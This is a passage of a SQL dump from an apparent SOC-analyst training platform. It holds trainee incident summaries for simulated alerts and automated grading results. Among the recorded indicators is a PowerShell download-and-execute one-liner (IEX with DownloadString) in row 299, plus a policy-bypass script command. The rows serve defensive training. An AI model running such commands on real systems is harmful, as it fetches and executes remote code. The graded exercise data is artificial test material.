(282, 185, 750, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.1.20\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 5:05:21 PM\\nALERT: Suspicious Email Detected - Potential False Positive\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.1.20\\n- [URL] https://example-trusted-site.com/document\\n- [EMAIL] trusted.source@example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T09:05:24.412Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 09:04:33', '2026-02-28 21:00:00', 0, NULL),
(283, 185, 282, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-192.168.1.50\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 5:07:37 PM\\nALERT: Malware Detected via Suspicious Process Execution\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 192.168.1.50\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] malicious.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T09:07:39.758Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 09:06:13', '2026-02-28 21:00:00', 0, NULL),
(284, 187, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-21 03:11:46', '2026-02-21 03:11:46', 0, NULL),
(285, 189, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/21/2026, 9:24:12 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-21T20:26:51.308Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_hash\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 19:38:33', '2026-02-28 21:00:00', 0, NULL),
(286, 189, 608, 'investigating', NULL, NULL, NULL, NULL, '2026-02-21 22:48:24', '2026-02-21 19:41:24', '2026-02-21 19:41:24', 0, NULL),
(287, 189, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\nDATE: February 21, 2026, 10:03:11 PM\\nALERT: BlackEnergy Malware Execution [Operation: Iron Grid]\\nVERDICT: True Positive\\n\\nKEY FINDINGS\\n\\n    Internal IP: 192.168.1.45\\n    Malicious IP: 203.0.113.50\\n    File Hash: d41d8cd98f00b204e9800998ecf8427e\\n    Filename: invoice.doc\\n    Username: jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED\\n\\n    Isolated Host\\n    Blocked IP/Domain\\n    Blocked File Hash\\n    Collected Forensics\\n    Escalated to Tier 3\\n\\nANALYSIS\\nThe investigation was concluded based on verified telemetry and adherence to playbook protocols. All identified threats have been neutralized or escalated following standard operating procedures.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-21T21:06:02.500Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 20:26:51', '2026-02-28 21:00:00', 0, NULL),
(288, 189, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"investigation executive summary:\\n\\nINVESTIGATION EXECUTIVE SUMMARY\\nDATE: February 21, 2026, 10:14:17 PM\\nALERT TITLE: Persistence Mechanism Established\\nOPERATION: Operation Iron Grid\\nVERDICT: True Positive\\n\\nKEY FINDINGS:\\n\\n    Malicious IP Address: 203.0.113.45\\n    Malware Hash: 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n    Internal IP Address: 10.0.1.15\\n    File Path: C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n    Compromised Username: compromised_user\\n\\nCONTAINMENT MEASURES IMPLEMENTED:\\n\\n    Host isolation\\n    IP/Domain blocking\\n    File hash blocking\\n    Forensic data collection\\n    Escalation to Tier 3\\n\\nANALYSIS:\\nThe investigation has been concluded following thorough verification of telemetry data and adherence to established playbook protocols. All identified threats have been effectively neutralized or escalated for further action as per standard operating procedures.\\n\\nSIGNED:\\nAmadou Mane\\nSenior SOC Analyst\",\"submitted_at\":\"2026-02-21T21:16:13.301Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (5/6)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 21:06:02', '2026-02-28 21:00:00', 0, NULL),
(289, 189, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n================================\\nDATE: February 21, 2026, 11:15:46 PM\\nALERT: Lateral Movement to OT Network [Operation: Iron Grid]\\nVERDICT: True Positive\\n\\nKEY FINDINGS\\n----------------\\n\\n    Source IP: 192.168.1.101\\n    Destination IP: 10.0.0.5\\n    Malicious Hash: 5f4dcc3b5aa765d61d8327deb882cf99\\n    Compromised Username: jdoe\\n    External IP: 203.0.113.55\\n\\nCONTAINMENT MEASURES IMPLEMENTED\\n---------------------------------\\n\\n    Host Isolation\\n    IP/Domain Blocking\\n    File Hash Blocking\\n    Forensic Data Collection\\n    Escalation to Tier 3\\n\\nANALYSIS\\n---------\\nThe investigation has been concluded based on corroborated telemetry and adherence to playbook protocols. All identified threats have been effectively neutralized or escalated following standard operating procedures.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-21T22:19:53.145Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 21:16:13', '2026-02-28 21:00:00', 0, NULL),
(290, 189, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\nDATE: February 21, 2026, 11:27:53 PM\\nALERT: SCADA System Compromise [Operation: Iron Grid]\\nVERDICT: True Positive\\n\\nKEY FINDINGS (6)\\n\\n    [IP] 192.168.1.105\\n    [IP] 10.0.0.20\\n    [HASH] 5d41402abc4b2a76b9719d911017c592\\n    [IP] 203.0.113.45\\n    [FILENAME] malicious_script.sh\\n    [USERNAME] unauthorized_user\\n\\nCONTAINMENT MEASURES IMPLEMENTED (6)\\n\\n    Isolate Host\\n    Block IP/Domain\\n    Block File Hash\\n    Reset Credentials\\n    Collect Forensics\\n    Escalate to Tier 3\\n\\nANALYSIS\\nThe investigation has concluded based on validated telemetry and adherence to playbook protocols. All identified threats have been either neutralized or escalated according to standard operating procedures.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-21T22:29:17.197Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 22:19:55', '2026-02-28 21:00:00', 0, NULL),
(291, 189, 274, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:31:44 AM\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\\nAnalyst\",\"submitted_at\":\"2026-02-22T00:32:12.388Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 22:30:34', '2026-02-28 21:00:00', 0, NULL),
(292, 189, 275, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:34:17 AM\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-22T00:34:34.538Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:32:14', '2026-02-28 21:00:00', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(293, 189, 276, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:36:27 AM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-22T00:36:41.956Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:34:34', '2026-02-28 21:00:00', 0, NULL),
(294, 189, 277, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:38:25 AM\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-22T00:38:38.823Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:36:41', '2026-02-28 21:00:00', 0, NULL),
(295, 189, 278, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 2:31:14 AM\\nALERT: Compromised Update Detected [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e5d8870e5bdd26602c622b7e5b0f6b4c\\n- [FILENAME] lib_mgmt.dll\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou Mane\",\"submitted_at\":\"2026-02-23T01:32:39.450Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:40:04', '2026-02-28 21:00:00', 0, NULL),
(296, 177, 934, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.89\",\"ip-192.168.10.10\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 2:28:46 PM\\nALERT: Brute Force Login Attempts Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.89\\n- [IP] 192.168.10.10\\n- [USERNAME] administrator\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T08:59:19.881Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 08:54:54', '2026-02-28 21:00:00', 0, NULL),
(297, 177, 717, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.20\",\"domain-http://malic\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"escalate\",\"collect_forensics\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 3:54:54 PM\\nALERT: Phishing Email with Malicious URL Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.20\\n- [DOMAIN] http://malicious-site.com/login\\n- [EMAIL] no-reply@trustedservice.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:25:32.586Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/2)\",\"missed_items\":[\"block_url\",\"reset_credentials\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-22 10:22:37', '2026-02-28 21:00:00', 0, NULL),
(298, 177, 364, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"isolate_host\",\"escalate\",\"collect_forensics\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:02:48 PM\\nALERT: Suspicious Web Shell Detected on IIS Server [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [FILENAME] shell.aspx\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:33:25.129Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:32:11', '2026-02-28 21:00:00', 0, NULL),
(299, 177, 365, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-9e107d9d\",\"cmd-1\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:05:52 PM\\nALERT: Anomalous PowerShell Activity Observed [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 9e107d9d372bb6826bd81d3542a419d6\\n- [COMMAND] powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\"\\n- [IP] 10.0.0.17\\n- [FILENAME] malicious.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:36:28.762Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:33:25', '2026-02-28 21:00:00', 0, NULL),
(300, 177, 366, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_2\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:07:44 PM\\nALERT: Creation of Hidden Scheduled Task [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.54\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:38:21.142Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:36:28', '2026-02-28 21:00:00', 0, NULL),
(301, 177, 367, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.1.10\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:11:28 PM\\nALERT: Unauthorized Access to Network Map [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.1.10\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] network_scan_tool.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:42:05.692Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:38:21', '2026-02-28 21:00:00', 0, NULL),
(302, 177, 368, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.15.23\",\"ip-203.0.113.45\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:14:11 PM\\nALERT: Exfiltration of Call Detail Records Detected [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.15.23\\n- [IP] 203.0.113.45\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [FILENAME] target_CDR_records.zip\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:44:48.507Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:42:05', '2026-02-28 21:00:00', 0, NULL),
